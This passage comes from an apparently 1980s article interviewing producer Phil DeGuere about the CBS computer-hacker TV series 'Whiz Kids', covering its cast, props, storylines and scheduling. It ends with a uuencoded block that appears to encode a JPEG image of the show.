  11961. at an early age to that they won't have any fear nor will be
  11962. particularly in awe of them," says Executive Producer Phil DeGuere of
  11963. his new TV series "Whiz Kids."
  11964.  
  11965. At the time he was speaking, it was January and CBS had just given him
  11966. the go-ahead to prepare a pilot.  After the pilot was delivered in
  11967. April, the network gave him a series commitment to produce the
  11968. successive episodes.
  11969.  
  11970. It wasn't until this past June that "WarGames" opened and DeGuere, who
  11971. wasn't overly thrilled with the summer smash, goes to great length to
  11972. make people aware that there are no similarities.  In fact, he says, the
  11973. idea was hatched more like a year-and-a-half ago, before WarGames even
  11974. went into production.  DeGuere, a large, slightly rumpled appearing
  11975. Californian, is one of Universal's most successful television producers.
  11976. He has been with the giant studio for nearly a decade and has had a
  11977. string of popular series including "Baa Baa Black Sheep" and the
  11978. current hit, "Simon and Simon."  A long time fan of science fiction,
  11979. DeGuere feels the new series, now seen on Wednesday evenings is living
  11980. up to the original meaning of science fiction.  He's taking today's
  11981. technology and expanding upon it in fictionalized settings.
  11982.  
  11983. "The important thing is versilitude and not accuracy," he says while
  11984. seated in his large office.  "You should feel when watching it that it's
  11985. the real thing.  I think we've succeeded in that because consistently,
  11986. computer professionals have enjoyed the pilot and even though they know
  11987. better than anybody that there are impossible things being done in that
  11988. pilot.  It's not like having a Volkswagon fly...it's not that
  11989. impossible."
  11990.  
  11991. Computer fans will find many identifiable machines on the show with
  11992. most of the major companies represented in one way or another.  "I've
  11993. got to differentiate between what are essentially props on the one hand
  11994. and working gadgets on the other," DeGuere explains.  "In terms of
  11995. props, you're going to see things like Apples and Ataris.  We have been
  11996. using some Aquariuses from Mattel and if Coleco ever comes up with ADAM,
  11997. I'm sure we'll use that too.
  11998.  
  11999. "On the higher tech side, we'll have some of the hot portable computers
  12000. like Gavilan and Compass, all of which basically are things people sit
  12001. at.  There may not be any systems functioning during the course of the
  12002. show.
  12003.  
  12004. "When it comes to real working gadgets, it appears that we have
  12005. worked out an arrangement with Xerox to use what is probably the most
  12006. sophisticated personal computer in existence, the Xerox 1100, which is
  12007. such an expensive machine and was responsible for some super-high
  12008. resolution graphics in the pilot.  After some modifications to the
  12009. machine it will be capable of generating some great graphic material."
  12010.  
  12011. DeGuere shifts a bit in his chair, runs a hand through his tousled hair
  12012. and adds, "We're into some robots.  We're using one called RB5.  They're
  12013. pretty amazing machines.  RB5 is like an R2D2.  We're planning to
  12014. incorporate it into some classroom situations."
  12015.  
  12016. The computer whiz and focal point of the series centers around Richie,
  12017. the "hacker" played by Matthew Laborteaux.  He's surrounded by three
  12018. friends with varying degrees of interest in computers but all love the
  12019. adventures.  There's Hamilton Parker (Todd Porter), the freshman class
  12020. president; Jeremy (Jeffrey Jacquet), the resident jock and Alice (Andrea
  12021. Elson) who wants to belong to the gang.  Richie is also forced to deal
  12022. with a younger sister (Melanie Gaffin) who wants to be in on the action
  12023. but is either too scared or perhaps intimidated a bit by Richie.
  12024.  
  12025. The youngsters go to a progressive California high school with a full
  12026. complement of computers and an exasperated teacher who is always bested
  12027. by Richie.  When danger lurks, though, the kids turn to Farley (Max
  12028. Gail, best remembered as Wojo on "Barney Miller"), the crime reporter
  12029. for the local paper.
  12030.  
  12031. Originally, the kids were teamed with a younger reporter, but CBS
  12032. decided a more adult, experienced role model was needed to offset the
  12033. youthful exuberance of the stars.  Also representing the adult world is
  12034. a cop named Quinn, played by A. Martinez.  And to keep things
  12035. interesting, the cool and dapper Quinn dislikes Farley, a Damon
  12036. Runyeonesque-type of guy.
  12037.  
  12038. As seen in the pilot, the adults do not appear to be the brightest of
  12039. people and DeGuere explains it's done on purpose.  The focus of the
  12040. show is on the kids.  We want them, the underdogs, to succeed.  In order
  12041. for that to happen the adults have to tune them out," he defends.  The
  12042. first story has Richie and the gang bringing down an overambitious
  12043. vice-president of a mammoth conglomerate.  They story, while amusing,
  12044. raised the ire of critics by the cavalier actions of the kids.
  12045.  
  12046. At a promotional meeting held early this summer, DeGuere defended his
  12047. show with characteristic bluntness.  "I insulted them personally and I
  12048. insulted their family and I insulted their heritage, their future
  12049. generations, their profession and just about anything else I could think
  12050. up.  The major attention being an attempt to get them off this idea that
  12051. they have uncovered some horrible sin.  I think we were very successful
  12052. in doing that."
  12053.  
  12054. DeGuere says his series won't show the kids breaking into computers and
  12055. invading peoples' privacy.  Rather, the repercussions of such actions
  12056. will form the core of some segments.  "We were responsible on those
  12057. subjects from the very beginning," he points out.  "There is something
  12058. synergistic about a computer program.  A computer program does things
  12059. that a computer designer does not always intend.  Even if you sat down
  12060. from scratch.  If the armed forces came to you and said, 'Here's all the
  12061. money and time in the world.  You're going to start from scratch with
  12062. the hardware and software.  Build us a network that is totally secure.'
  12063. I don't think it could be done.  That's one of the things that's so
  12064. fascinating about computers--the program ends up being more than the sum
  12065. of its parts.  Even though, in most states, there are statutes which
  12066. state that accessing another computer system without permission is
  12067. against the law."
  12068.  
  12069. "Whiz Kids" will benefit from the experience of two consultants, adding
  12070. a level of technical accuracy other films and television programs have
  12071. missed.  David Gunn worked on the pilot and was signed on by DeGuere for
  12072. the duration of the series.  "He's very knowledgeable in the field of
  12073. microcomputers and I'm fairly knowledgeable myself," he says.  "We have a
  12074. technical advisor on the show who is an investigator for the District
  12075. Attorney's office and is a peace officer who has specialized in computer
  12076. crimes for years.  So, when it comes to areas of legality on the one
  12077. hand and technical accuracy on the other, we go to him.  This is a very
  12078. tiny portion of what's going on in the series.  I personally would
  12079. prefer the technological aspects to be handled as accurately as possible
  12080. and I would rather have it believable than sound stupid.
  12081.  
  12082. "In many cases we will have characters spewing a lot of jargon and it
  12083. happens to be true but it's not intended to be something the audience
  12084. has to follow.  It's like medical shows where the doctors are talking
  12085. about this and that," DeGuere explains.
  12086.  
  12087. The series will be a fast-paced mixture of adventure and intrigue that
  12088. usually has the kids stumbling upon a problem and then acting quickly to
  12089. stop the crime or criminals without getting caught or killed.  Added to
  12090. the stories will be glimpses of their home lives and interrelationships.
  12091. DeGuere repeats his hope that the show catches on and finds an audience
  12092. so he can have the kids grow and develop, something fairly unique to
  12093. series television.  "If the show clicks, we have it cast in a way that
  12094. allows us to follow them right on through college," he optimistically
  12095. offers.
  12096.  
  12097. When not in school, the kids will be clustered around Richie's home
  12098. computer and trying to crack cases.  Richie has built a complicated
  12099. system that would be any hacker's dream including a voice activated
  12100. system named RALF complete with camera and robot appendages (This way
  12101. Richie can eat a sandwich while using both hands to manipulate the
  12102. keyboard).
  12103.  
  12104. DeGuere offers some upcoming storylines as examples of the broad mixture
  12105. of the series.  "Richie has a friend who he met at the computer store,
  12106. who happens to be a data processing manager for a local chemical
  12107. company.  As it happens, they have just installed a new computer
  12108. security program and he thinks the best way to test the program is to
  12109. have a hacker like Richie try and break it.  He hires Richie who breaks
  12110. into the system and discovers a Trojan Horse buried in the computer.
  12111. There's a program running inside the computer, developed by a bunch of
  12112. unscrupulous people working at the company.  These people are in the
  12113. process of doing chemical biological warfare of their own, for sale to
  12114. unfriendly third world nations.
  12115.  
  12116. "Needless to say, the project manager quickly disappears and Richie is
  12117. the only one who knows he's in trouble.  He doesn't know why but he
  12118. knows his friend is gone.  The kids unravel the mystery."  The show will
  12119. also feature a guest appearance by "Simon and Simon's" Jameson Parker in
  12120. a bid by DeGuere to help link together the two CBS series.  Later in the
  12121. season when the Simons need some computer expertise, they will approach
  12122. Richie.
  12123.  
  12124. "Or," DeGuere offers, "There is a computer used in the San Fernando
  12125. Valley linking all the policemen to the department's computer.  It's
  12126. been the subject of a lot of articles because of cost overruns.  Our
  12127. story suggests that a clever criminal can figure out how to emulate one
  12128. of the Mobile Data Terminals or the host computer.  These are a bunch of
  12129. bank robbers who figure out hat with come high tech stuff, they need
  12130. only 15 minutes to get into the banks, get the money and leave.  All you
  12131. have to is make sure all the local police units in the area that could
  12132. respond to the call are unavoidably detained for 15 minutes.
  12133.  
  12134. "That's what they're doing at the start of the story.  Everyone thinks
  12135. it's a matter of computer error until Richie says, 'There's no such
  12136. thing as computer error.  It's people error.'  They go on to prove that
  12137. by stumbling on to the criminals."
  12138.  
  12139. During the conversation, held long before the series finally premiered
  12140. on October 5, DeGuere points out things are still developing.  "We are,
  12141. at the moment, waiting to see how several different approaches to
  12142. storytelling turn out on film.  Right now, I'm just seeing the rough cut
  12143. of the first episode after the pilot.  So I'd say we're in the gestation
  12144. period right now.  We are not one hundred percent sure of what mutations
  12145. are going to be appropriate for this particular child.  None of the
  12146. things are quite formulated yet.
  12147.  
  12148. "We're trying to inject and build into the scripts as many solid
  12149. entertainment values as we can.  We want to have characters you care
  12150. about, relationships that feel real and a general sense of fun rather
  12151. than try and throw everything about computers into it.  We're trying to
  12152. make it high tech on a lot of different levels, not just computers.
  12153.  
  12154. "What happens on a new show, based on past experience, is that you don't
  12155. know what is really working.  I don't know until I get a chance to go
  12156. home on Wednesday night and watch the evening news, watch the promos.  I
  12157. like to see how it leads into the movie and by that time, I will have
  12158. begun to have an impression of what we're doing right and what we're
  12159. doing wrong.  Most series hit their peak, in terms of quality, in the
  12160. middle of their second year.  It's true of "Simon and Simon" and it's
  12161. true of almost every other show I've worked on."
  12162.  
  12163. The show was originally scheduled to air on Saturday nights but over the
  12164. summer CBS switched it to Wednesday explaining that it would be a better
  12165. opportunity to attract the youthful audience a show like "Whiz Kids"
  12166. needs as a base.  There are more TV sets in use on a Wednesday and the
  12167. competition is diffuse with ABC offering "The Fall Guy" and NBC serving
  12168. up more "Real People."  This gives the show a better chance than if it
  12169. was put up against "Different Strokes," "Silver Spoons" and "T.J.
  12170. Hooker."
  12171.  
  12172. "My personal feeling is that the show will be given a reasonable chance
  12173. to succeed.  It will probably mean two or three weeks after the World
  12174. Series and if, by then, it has not established an audience, I do not
  12175. anticipate it will be moved around--I don't know where they could move
  12176. it to, frankly."
  12177.  
  12178. As a result of researching the series, DeGuere who owns an Apple at home
  12179. and has an office automation system in place, feels that he is fed up
  12180. with computers.  He complains of not being able to find the interest in
  12181. running programs on his personal computer and has spent weeks getting
  12182. the office system to work properly.  Between that, researching the
  12183. series, watching the critics nitpick "WarGames" apart and the press
  12184. reporting every move made by the nation's hackers (most notably the 414
  12185. gang) he's fed up.  "People are being bombarded about computers
  12186. everywhere they turn.  They take five steps and somewhere you'll be hit
  12187. by the subject.  Consequently, there may be an overkill factor involved.
  12188. The best of all possible ways our series can benefit from "WarGames" is
  12189. if a large number of our potential audience think that "WarGames" was a
  12190. movie they might have wanted to see if they wanted to go to the movies."
  12191.  
  12192. Fact or fiction, reality or overkill, Phil DeGuere is hoping that his
  12193. series, co-created with producer Robert Shayne, will find a place in the
  12194. prime-time sweepstakes.  The idea is certainly unique and he is
  12195. fortunate enough to have had the show in development when the rest of
  12196. the world was just beginning to understand the important impact
  12197. computers are having on our lives.  Now, the question remains, do people
  12198. care enough to tune in once a week and watch a group of students battle
  12199. for truth, justice and the American Way using microchips, floppy disks
  12200. and modems instead of guns, badges and sirens!
  12201.  
  12202. --------------------------------------------------------------------------
  12203.  
  12204. begin 644 whiz.jpg
  12205. M_]C_[0"3061O8F5?4&AO=&]S:&]P,BXU.@!D````9```.$))30/M```````0
  12206. M`&0````!``$`9`````$``3A"24T#\P``````!P``````````.$))30/T````
  12207. M```2`#4````!`"T````&````````.$))30/W```````<``#_____________
  12208. M________________`^@``/_N``Y!9&]B90!D@`````#_VP!#``0"`P,#`@,#
  12209. M`P0%!`0$!0<&!04%!PH*"`8("@H-#0P,#`P-#A`0#PX/#PT0$1$1$A,5%144
  12210. M$A45%145%145%17_P``+"`$1`9`!`1$`_\0`T@````8#`0$!````````````
  12211. M!`4&!P,"`0`("0H+$``!`P($`P4$!`H!#@$#`&L!$0(#!`4`(3$2!@=!"!-1
  12212. M(F%Q@10)D:$R%?"Q0B,*P=$6X?%28C,D%W)#-!B"DADE1%-C)G,U5">B9+*#
  12213. MDZ-TA)3"TC9%LT:DM%;#TU4H&N+RX_/$U.3T976%E:6UQ=7E]69VAI:FML;6
  12214. MYO8W1U=G=X>7I[?'U^?W.$A8:'B(F*BXR-CH^"DY25EI>8F9J;G)V>GY*CI*
  12215. M6FIZBIJJNLK:ZOK_W0`$`#+_V@`(`0$``#\`X[N\3HZ]S4("#IB!2`"5]IQ'
  12216. M,Y3^O%.JXUP.AQ@.(/NQ)'*\-R*8GCJ969AW3$\5RJ&E'=.F)X[D!D]@\"F)
  12217. M65],6;2#C(DI)&/\R%<@?QXC=$'%Q;(T^&>,&)P14UZ'3$+XWAZ%I]J98J6.
  12218. M3KB+//V?1B-%'F\,;(<PU-<8`(C.6IQ&YJYZ8RT`$'48UV9UU.->T;DZ8J[3
  12219. MKBI=T!]F,D(/7&L"N3JF-<Q"3KBH<@)^OPQG-VX>&,)D`<9VC+%FMTQ)FBZ)
  12220. MC!^T=N+MT/1,985.0_CB^IQDE6C/3&8QN!'UXP5!0KC"..-0`J?JQ;<K,L8<
  12221. M2B$]<6:I5<5>I`(7/IC7!P;GF5TQ4$C'_]#F7B2VTM'Q_P#!U]0:6(/9WDFP
  12222. MN#&^X8,N.8K956V"EMMRI9:2B:X0/,!CDE74DG4X;N:)PE<W7,YX<KDER_CX
  12223. MIX.XJN4EMJ*^2C:UE.87`(XYE%(4CJ/#!9<^7=Q@+EMEQA#<R70N(^K"=KN'
  12224. MS"_87N:[PD:0<!)K9+%$7%S2@P%;&[;HF>+PT\LDK&,!<][D#0,R3A35W+KC
  12225. MFEIF5$U@N`C<T.:YL)<"#UR7!#6VNY4;B*JCJ(2#I)&X?C&`VR1VYH:2G08C
  12226. M>)(W%K@6D=#C+9Y4!#G8F;6U#/ROXXEBK:A[<PU/Z3M,2O=&ZD=-OC:0_;L0
  12227. MESAX^@P"GE?')W9;L)S0]`1EB)TQ`1`BKC+9`4&U/'TQ;(G(Y>N,.&B?5C(;
  12228. ME[=,9D"_9]^(SED>N,$9JF8.,E-J:XJ,G@XL'`DC/&"F9&*=5&N-S48D&28L
  12229. M%08NT_9#O#&0,E&N-+?3%D'3ZL9"HF,L"XSIT5<5<"OZL9]VGAC0TEPQ9Z:!
  12230. M<9:S<=S3X8NBDG&=A\HZ],1S-SS*8O-3%E!'/_2<BX__T6OYO<,6R?G"(9;Y
  12231. M26TRQM>]E2`D8`R709G$G&UWN</";.'^_P"'[E3P,1M1`U'N]P)"X:!M%1GA
  12232. MVJJW_P"&MKV1-:'9=T8W%V7M`SQT/V+S+3<M[_*V*4-%:#N`\OV1^+KAY*2I
  12233. M;,PODV#)#O'[<-=SI@HWUE*XQ4(V^8N>P9>&&IXPMD3K'.\,M[_+]J(HX#V+
  12234. MAM7V](PG4X57(_AB:^<V^&K<'F-KJIKWR-"[&LS)^K':E^K[?:(Y623RB-C?
  12235. M--W2Q1)D5=AJ>;O,GA.SPMI7%EUG>2V1E+&#W9`T+W>4'P0XYYXTXOI[A>*J
  12236. MIL]%]U4,FP2QQ(Z0'55(*$G7:@.$OQ/=Z&LAABHZ$4X82Y\CG;GR$ZKX#V8)
  12237. MVN`9KETSPH*8\#S48=4?>E/4AC58P1OB>[J!H0/#7`&^0VV%D'W=5S5=.X-<
  12238. M8YH^[?&[J,B0?:#@NJ"#*\M*M<5!52G[<12$N<7YK^4<9>"'`^BC%?RM=>N-
  12239. M+UR*ZXLU^W+4:K@0WS-5IQNTY$Y8C.J#&`"AR7&[2/%?Q8T-\R'KC2TJB(#H
  12240. MN-VDC3&[2=1KT&-+'=<CC*(F1Q8J570%<7R(ST&-:TM<HTZXEVD.R\,9#%:X
  12241. MG5,L8#"&@(I7%V,<<MH]N+-C.S/ZL4[MX<%.1Q*8B`I&-[D]?'(8P6>/7/%Q
  12242. M'Y44C%XMH<6GPQ7[+CDK1B*1PS.9`PH>(K::;@2Q5;@@JGR$>['_TD%VG+3-
  12243. M+QLZHIQ1/:D#>Y>?SJ^N>F(6\%UE+P5<:N>S6ZH=6Q->)HY?-$`%R!&OL.&=
  12244. M@M[W5TT>TJ"?*.F.G>QU2O;RON49F>Q:UQ+$\K"@_'UP[$(V1/#VL<H.9&$M
  12245. MQ!0P7>XRT@-#'$^%Q,LB$CIHNF&QX^X1BBX6N-4V&B#F1[?S;@ONPTU!P[4S
  12246. M6B2M="YM-$=SYB-&C[6WQUQ+RUXG/#G%M)6V:#XNY,<YD+)00P-<,W%#GDN7
  12247. MOPH^/^9-VJ;YWU5?OC.^B#>Z9$SN:1I(W!C<B2!U.>$+QEQ-4WDQTM,U\U-2
  12248. M.<YC_P`IX)7[`R&?5"<)"6:&9[GASXYGE'Z;2.F0&-N)C@D@<R-DL1:H):@>
  12249. M=#IF@.`M4XRP1N;&UC&E%;HOMP')"Y:#$O>K$&[B@5&XGMXI)F/9.US7D(QX
  12250. M>`T'U7IB*YTSZ2K?3DKM^TARS]=#[1B!PS`/@F,#(I]>-(&1'CC3EH"$7$D#
  12251. M]KP#H<#',)`/XL1F(H=H/MQ/26VHG<P1C(ZN.0`]N#"KLHIJ24O<TR9%GYQN
  12252. M87P7!:*1Y<-P1=,\7;2O<H#5(*8G^$)4%B'P3$4U,6M/UX#;0#U.,;.F?CC2
  12253. MW+VXLQOT8O"PEKB>F>>)&.`.F73%G*N?7&6B0N5@R7%@)'DE,21LE<"`#EC)
  12254. MIYB24/H/#&/AYB$ZKF,8,,J@'+:.O3%3&\$H[%F4\FU=R@=,6[MS54G$4D66
  12255. MY=3BCH]Q:&ZD@8=WM"6=EIY6\NXF!'.@)?T!<0"?QX__TP?-^O@/ÐZVT0
  12256. M5$5"V&03C[;]S=--!X8)N$+MP7262:EN%%,]T@>0BEH7IJ/'"/X9X7AN'$-5
  12257. M\*6.C+GN8SJT=`</_P`@+#-;>!GTK7!@DG<[81U7"XEIYQ&]FR//4^.$;>X)
  12258. M(JC8VC@>T9A=,(/B_@^2N;5W"=D=/&F<,;UW@=,'E;7\-VGE3;K`L$53<*9M
  12259. M,70_WMSUR.2DJ<\M-<<IMNERX)XHO='$Z'XLQ24SGO9N+`3GL70D=?#"7J(P
  12260. MX=])(CY"H'3,]<;05LE&7R4\CF2[=K7-Z8".W.<2`<PIRQB0,+&ECG.*>;<$
  12261. M0XV#O3$X,7:"KO#VG&U(\L;L@HZ8C(**`<AC6')/3KC`<KAX:8NXKH/?B@:N
  12262. M9T/7&1N3PQE^34Q7,Z=,*/@&R5_$U\I;/;V;I9#YGN^Q$WQ<>@PM>(^%K7PY
  12263. M331NJV/[M1)5N&3W@+M8!T]?QXAX;X=K;]:OC[@YMIL$?F#0C9:AH.K0>GB3
  12264. M[L)3CFGI*6Y&*W0=U`UH[MSPI>/%3K@MX:NPME>]U1`VJA>US7,=JU='#U!S
  12265. MQ(R[24U:UPVRL!W-$@!#E\<'=HIW7.WR5E*TD,<=[&YF,?LQ2KH7-C>3FT:G
  12266. M!9%0RS2.[MBM8"J#$,M,YC4^O`1[D<6G/Q.+,1P1<3Q@!I0KEBT#?-H2N@P9
  12267. MTUOK)G,;#1SR.(R:V-Q)^K!K'PO?XZ;XF:U5L4#?M2OA>&@=,R,":#A'B*MI
  12268. M_BJ.TU4].NWO61.+7'P7!W:.5?'M>Y\E+P_5>4H=P#?QG!O5<I^,;70&KO5H
  12269. MDIX<@'!S20I3,`G"AX>Y"<=U-*)1;:3;(T%CI9@"%\<B<5F[/W,"2Y&F914+
  12270. M,PKW3C:!]"XGNO9NXXHK'67"=]M=W$;GF"%SR]Z#0*T!<$W*_D3>.,:!]PCK
  12271. M:>CA#MH9("YQ(UR&F#'BGLYW*TBG=->J1XD?M<=I:&_2<\(GC7E=4V"'>ZM@
  12272. MJP"1^:(_;A(QVAWWC0Q%A5TK&GWNP\_;5@^%X<X%I0C1'"X!@Z(T8__4,*NB
  12273. M;6<T.-GU42Q)2-:2A!1BX.QP]P_-:Y@ZA82&%H)8%!\<$_+_`(<^&O-6`VF#
  12274. M"'$&)-R)AT.&[5W-IC$1#';].F!-53U#F.#F@IH[-#@HO-B;42,>YP5,V_T<
  12275. M,ISH^]:.&HAX=#)'Q5]-13%\B`RSYL:.B]3AMJSBRLH;AQ?+>G_`U-)&R*&G
  12276. MI"`[OR=HW2$$AR!20F0PRM?)--6S32/,CWN+G2*27$]5.>>(I-P`W.S\,;!L
  12277. M5IE#G,Z@%"<:][F[F1N*)J.HQ2.1S5`T=J/'$O?_`)H,S+0<@<1.(:$V@J<R
  12278. M?U8K(XD>GABL:[3Z8PQ,P?'(XE`&6W5,_;A5\NK!2WBH$-1*(W.T:X*3XD8=
  12279. M*@Y/61T;'UD$@$GD9W;SYBX>5V&QYL\`UO!U]-(KYX7,#FREIZ],(\LVY$>W
  12280. M!OPW>KC:N_@MLSJ<U8#)WM<A<Q51>@\<">*.):FMK*6,/[RGI'%T4+LXP[KE
  12281. MU]2<SA1V/F.[OC)?8(:N.3)L+8P6P`:%K#Y5RR!R&"WCVY62J#)*&1=T8,C6
  12282. MDEYD/12$`'5!A&E7.4:8WJA^O"AY=W5]NOK(@X-CJ?S<CDT!R7U]1A1V^KIZ
  12283. MR2LI@T!\#W`QD]!EEZ85=@X5$'!\]P=&XOF!`PA[U0.A!4`',#JF$=('"5P)
  12284. MU.!$3#DFF!,+`B9KX#!]P-<&66\4]QEIV5(B>IC?H<=;\FN+*+B:*"3X.DI'
  12285. MAH1H(+O8/#"XX_C$_`]SIV.A#7PN&YS5`48`<!4`HN!+93"9`UC<PS,^@`&%
  12286. M;9VAL,@[]R`G/9I@JX^HVU]JCIC/+MDD:K0/M`'1=<*BTP,AI(8VF1K1&$&X
  12287. M^&(F4\9KWR+,'9*IR`P%XUAC?PI=(W=\KH'M\I.X9',83W*.PP6SA&EB-'YI
  12288. M!O?(3FXDZG!GQ/:Z*?X5SK0RH+'*.\+?+ZY]<-'SLX?I_@)'Q6ED#2"KHW!1
  12289. M]6&/DLSV\3V>.-CE=41[5\=PPK>W-.XWGA6E=EW5&X[?51C_U5M8Z*.IXSXL
  12290. M"INJ(6.)"C*,845-9TC,9+2URC+%N'>'(Z&OFJ&1,&\'<6KG[<*FGH&R4T6_
  12291. M(JNT8FG;%3Q&+;N!S).N">LIPZK$@!R'V3X8XT[:-S8.8#+9;I'PM#S4U4+2
  12292. M0TU!``=ZHT``^W#,5-3)/4U39YW[9Y`Z0N)=N(ZGQ.(9Y8=H9`UX:/M%QS?Z
  12293. MITP'D51D,8<FT*ASQACB'A"%7KIBWE=/YW$C\IS1^(8P\`/0$D+KC>Z<^-SF
  12294. M`$-.?CB/:@()QL2!Q0J,4(0^PXG@"R-!R!_'AV>3%/.VH9'31MDD=M(`3<OH
  12295. MN.@+&YU=0QBL@8P-``)!#LLOP."#G%:8ZVU0QJVH[L;0'YE#E[<<V\UK&RT7
  12296. M.%T8#>]4.;T"82P4>TC%`I*DX%U%(8*6"H<X'OU(:-0A3$<T#HHF.>0#)F&]
  12297. M0/'%`WRGQU]V,)B2!Q;,QX^T"#A0W^L$'$]-=*0!@J8XGR,:$!<6@.^DKAT9
  12298. M*NYGA&J:)-L,,)>P`9YC#-U5TKI)'E\CB2N1Z8`J9)U)4N.!K`0T)@73-_-O
  12299. M?^4F#3AR@^.K*>E>]K!)(&F1WY*XZ#Y><+1\+UE-+054=:Y`Y&YD_1A[;?7U
  12300. M5PX8V5,#*=TGY!77WX/;?3`6NF8)`"QH"[=,#[9$TJ1*OAEBEPA[R2(!Y/FU
  12301. M3!I3HUC&J2@5!]>`\&TUDS@\N"A#X#$?$8[RW2!LA:'C$=BA;#;V-'>`@=#E
  12302. MB&ZQQ.DB;(^8$*<B47UPCN/K4VKHGL9+("=0Y2#ALW\,#^V#8T'>;)0_3PSP
  12303. M@.W7.UW,RVP?[F@;DNBDX__6<2S.%)Q'?W002%\LS'.<\(TG8!Y2F%%05DCX
  12304. MU?"`G@<&5JJC5.EB,!81U4(1[L'D43A3L<H:",L!JMH$@5PS&:?CPBN=_$$/
  12305. M"7*OB&_3`DPT^R)H)&^1YVM`.HS..0.<_'%JOPAGGMT-3=W1"(W1P!='"!F2
  12306. MUIVF34`Z#VX:4"GDJ))9%BB0[6@*IZ#]N`)\1XXRXN7/WXW\A>A.*E`3TQK?
  12307. MQZ8RT9H=#B1CW1H&JBKZ'%MBF02-1Q'7)#@.UA!"!5RQEY`=F/9BT.XSQB-J
  12308. MN4(WQ.'CY&7VQU=Q;;KQ(VTUS-OPLS_L/<N8/@</U9+W/478VSN&LE$>]LC2
  12309. MK')JA.`G'D5-6R5$4,@^(@+07-.B]%&.<.T;3_!\44E"Z0R/CA+W%513EI[,
  12310. M-XX`@8J0=R^N!$\XDCIXQHP(3[3@2#;Y*8_UQDC$VKF'!<_H&*U43&PPOC>U
  12311. MSY07.8/R`N0)\<!'!'(1IX8$4-+++,WNVDNU`'5/#!QQ;+124-L;2-[JHI]S
  12312. M96JJJA!!\%7+#T\!F*X\+4T\C-[9Z9I<"-<O-]>&XYG\,TU.U]101;-JE^W3
  12313. M#?TX/?-P8ANY`%]<#:-H[ES3Z9X4G!5KK+A-$*>%[V;PTR-:2&*?3'6O*_@J
  12314. M&VQ44IDWO:QH<7MRS&%_>J:&.F8=P"(F0RP,IG!T,;6N:NT$KUP,H04'F`7)
  12315. M>N+5+7.FA#2"5&@0^W":YA<T^`N"`ZGXAO=/%5L5:2!99RG38Q2/>F&AN_:Q
  12316. MX9BN;FVVQUL]*'`&:5\<;D\0S/Z%PL+#SZX`O]N:67>*FD+=SX*AI:]I7,>!
  12317. M]RX6G"/'?"MW,<%NO%%),\#;$7AKW>P.0DX.*Y^ZKC61J$$G!1?&/DBVEK7@
  12318. MI]&$W1TC'<5QR.`6+1.F.9.V=.9N<U2U2[NJ6)H]ZG'_UW#LYO,_&O%]/(PR
  12319. MT]%+`*<.0?:8"0#UP?1Q5#:9Q=2/4J"0[`KAF%T,U2\0OC\N6]RK[,*IC6RV
  12320. MZ,.&F>N`QIF!Y4*$R0Z8;7M/\//XFY+<36J%>^9#\5$"=71'<A]H!QP#=0Y]
  12321. M+#,X!A<-K6-(R:!X:KZG!>7':6%=JJF(T)=EKC#AGKUQDM6,+C0%!!]V#7A7
  12322. MAF^\05K*6R4$]9([3NVY#VG08=_@SLR<67.,3WVMI+4"%$3?SLA]J(!].'*L
  12323. M'9FX(I;5\-<:BMK*QV9J@\,#?1K$(3VJ<+*S<EN7-LLWP8LD%47_`-=FJB7R
  12324. MO*?TER]@3"3XM[-G`MQ+IK4VJM$A:`!#)NC!\=KE/UXY^[0_+./EO=K31LK7
  12325. M5WQL,DF]S-I:6N1$4],)KABR5U9155UICW/P3-\3WM\LL@*[`=-Q"D#`GBNC
  12326. MXCJX;5<J^GB?)6Q/?"*8-=)M8<R]K%+3USZ9X..#.8?%-#%3VP3-+(PYC7U&
  12327. M7=M.JDX4MMY@0T4M4V2M;)(QKG[G#^O/3Q\,-=QA=IKS?YZZ:0R%^2GP\,%H
  12328. M`T).AQ12J8UH<Y2ARS)'AB["1@=8Z6JN-TI+?1P.J9ZB1K(XF`ESB>@3!UQG
  12329. M9)['=/N:NIFPSTZ/F+05`>`0"3X8+75S*-\#J9P#HMKVD#1XP!N56^MK)*B4
  12330. MC<\J2`@P_P#V>5JN6$>[S]Q-+'IHU?XX"\UZ%L/"]QD(`<UAS.9&&(IP3,T'
  12331. M^6#*)=P&#*"-O<.VZDA3AYNS;=)J:@EH6BF##*'$S#,9XZFX5E9-;HW`QIF0
  12332. MAP(O+6F*,ES`247P&)86DL:06DM'0ZX*...8/#'!5M=-?KA''(UH<:6+\Y.0
  12333. M=#L&8'J4&$_8>.Z+F=:IX+/+<;72[MLU1%W;)@PYH'%=@=X@'#(\[7<H^&:>
  12334. MNMW#U))4W.0.;+5.D=,Y[E\Q>YQ&:_RQSK7RA]2]PR"HF*V]TK*N-\"N>"K0
  12335. M`IPJ*^[UE3\/(^4M9(X-VJA@>OVFZ$?5AQ.5':+XJX3N<=JXH>Z_6B,]WWDA
  12336. M'Q,+/%K_`,K+H[Z<=)6KC?AWBOAN*[\/53:N"5&NV%)(B>CVZM.!'#KFR7;?
  12337. MJX>/ACD[M73BHYY7P$D!IB8GAD,?_]!R^#*J9_%'&'>!TC65436D!`!W8R7K
  12338. MA15,S3"Y(Y4((\OLQ%PPH,HV3:%>]Z#"C;-LA8,\LLL$O%G%_#7#8)OMXI*!
  12339. M^W<8YI&AZ=#MU3!':N.>&.,;/=7\.5T=?W$;HW`@M;(YP(`4C-<>=7$#I&7>
  12340. MX4[V[.[J)6EF61#BH7K@"4(73]6,+F`?YXUY)<`<"+?!)4S,@A89'R.1K!UP
  12341. MK1P--;#%-?%A#P'B($9-_JC^S#@\M.:?"O"-J;3?#SU$S2`P0,`;ZYG]6'#G
  12342. M[1?#5JIHWS4[JF1S(WF&E?N<PN"D$D`*W0_5@5:^TSP#42L^+AN%)NU<^$.#
  12343. M?7RN)^K#K<+<1VGB6R072R5<5;22@ALT9R)&H/4'T.`W&'%U@X9@:^_W&FMS
  12344. M'A6B:0`O'H-3[L<O=L'C3A'C.HX=GX>N(KZFC[Z.;:QP:&.0A"0%S&')[,%%
  12345. M1.Y/VN&+N9YB^5U4S<';7N<4#AT.U,+FHLMKL%NJKC'!24D[FD,<Q@`!37]N
  12346. M$/<N%.%JSE;Q+'514U96.8Z>.8,&^)^>8..:N(>$*NTL[V7=)$YG>-F``;M1
  12347. M2J]?#"9!W?3C)/ABN:_CQ(USFL>T.(#@C@.H70XEH8#454<`<UKI'!H<\H`3
  12348. MXG'879HY1V+A:VLO51/%<;S/'Y:F,JRG!&89^LX1?:@L=NI.8-=)4R1LCNMM
  12349. M:.]>!Y'M``=]("GP..;96D.<TIN:2"GIBK<\DSQU'V8+-\-RFI*D-5U;++(<
  12350. MM1NVC\6(^?EO?^Y->^'S.#-Q#1H`BKCFZUQO?5$@'R@G!I%#N<T:%-,&<;=M
